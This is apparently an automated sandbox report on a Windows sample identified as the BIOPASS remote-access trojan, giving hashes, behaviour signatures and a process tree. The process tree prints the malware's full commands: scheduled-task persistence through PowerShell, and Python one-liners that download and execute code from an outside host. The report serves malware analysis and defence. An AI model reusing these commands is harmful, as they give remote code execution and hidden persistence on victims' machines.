Overview

overview

10

Static

static

10

fb770a3815...51.exe

windows7_x64

10

fb770a3815...51.exe

windows10_x64

10

Analysis

  • max time kernel
    74s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-07-2021 07:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe

  • Size

    4.7MB

  • MD5

    f12a1c138bc56653a09076cba61d392d

  • SHA1

    f20a850162677f244aead08cceae74ecbb5dff37

  • SHA256

    fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851

  • SHA512

    814146e040c905ef10002d9f9edc3b39445aa06070f0934b6b58801eca8cc29838e84b87ab5d9cdc3883bc8cef38a0b7ac4daa0a50c4cb32010977f3d99e8488

Score
10/10
biopassdiscoverypersistencerattrojan

Malware Config

Signatures

  • biopass

    BIOPASS is a RAT connected with Winnti group (APT41).

    rattrojanbiopass
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 26 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe
    "C:\Users\Admin\AppData\Local\Temp\fb770a3815c9ebcf1ba46b75b8f3686acc1af903de30c43bab8b86e5b46de851.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3944
    • C:\Windows\SysWOW64\ping.exe
      ping baidu.com
      2⤵
      • Runs ping.exe
      PID:184
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Public\vc.exe /install /quiet /norestart"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1248
      • C:\Users\Public\vc.exe
        C:\Users\Public\vc.exe /install /quiet /norestart
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2320
        • C:\Windows\Temp\{3A024B19-D065-4D43-9CAE-C63A850EEF56}\.cr\vc.exe
          "C:\Windows\Temp\{3A024B19-D065-4D43-9CAE-C63A850EEF56}\.cr\vc.exe" -burn.clean.room="C:\Users\Public\vc.exe" -burn.filehandle.attached=528 -burn.filehandle.self=548 /install /quiet /norestart
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2948
          • C:\Windows\Temp\{E8EE015A-BFBA-4369-BF31-01AC2537FBC3}\.be\VC_redist.x86.exe
            "C:\Windows\Temp\{E8EE015A-BFBA-4369-BF31-01AC2537FBC3}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{8CFC0C88-AC41-4C8E-B273-DFD09FCA00AC} {ED5CD3B4-2ECA-40F0-9EA1-16D6B36F1235} 2948
            5⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Modifies registry class
            PID:3964
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_SETTINGS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3872
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2808
      • C:\Windows\SysWOW64\schtasks.exe
        SCHTASKS /Run /TN SYSTEM_SETTINGS
        3⤵
          PID:3344
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\flash.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\flash.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2948
        • C:\Windows\SysWOW64\schtasks.exe
          SCHTASKS /Run /TN SYSTEM_TEST
          3⤵
            PID:3528
          • C:\Windows\SysWOW64\schtasks.exe
            SCHTASKS /DELETE /F /TN SYSTEM_TEST
            3⤵
              PID:2932
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_CDAEMON"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3864
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3900
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /Run /TN SYSTEM_CDAEMON
              3⤵
                PID:3528
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:188
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
            1⤵
            • Checks SCSI registry key(s)
            • Modifies data under HKEY_USERS
            PID:2388
          • C:\Windows\system32\srtasks.exe
            C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3636
          • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
            C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec('import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\'http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\')).read().decode())')" a a
            1⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2180
          • C:\Users\Public\flash.exe
            C:\Users\Public\flash.exe
            1⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            PID:1760
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 2012
              2⤵
              • Program crash
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3596
          • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
            C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec('import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\'http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\')).read().decode())')" a a
            1⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2932

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1760-215-0x00000000001E0000-0x00000000001E3000-memory.dmp

            Filesize

            12KB

            Download

          • memory/2808-139-0x0000000007C90000-0x0000000007C91000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-131-0x0000000004030000-0x0000000004031000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-130-0x0000000004420000-0x0000000004421000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-132-0x0000000006CA0000-0x0000000006CA1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-133-0x0000000004032000-0x0000000004033000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-134-0x0000000006B40000-0x0000000006B41000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-135-0x0000000007440000-0x0000000007441000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-136-0x00000000074B0000-0x00000000074B1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-137-0x0000000007520000-0x0000000007521000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-138-0x0000000006C70000-0x0000000006C71000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-140-0x0000000007B80000-0x0000000007B81000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-147-0x0000000004033000-0x0000000004034000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-145-0x0000000009270000-0x0000000009271000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2808-146-0x0000000008930000-0x0000000008931000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2948-192-0x0000000006D02000-0x0000000006D03000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2948-191-0x0000000006D00000-0x0000000006D01000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2948-213-0x0000000006D03000-0x0000000006D04000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3900-214-0x00000000075C0000-0x00000000075C1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3900-217-0x0000000004622000-0x0000000004623000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3900-216-0x0000000004620000-0x0000000004621000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3900-243-0x0000000004623000-0x0000000004624000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3900-220-0x0000000007A80000-0x0000000007A81000-memory.dmp

            Filesize

            4KB

            Download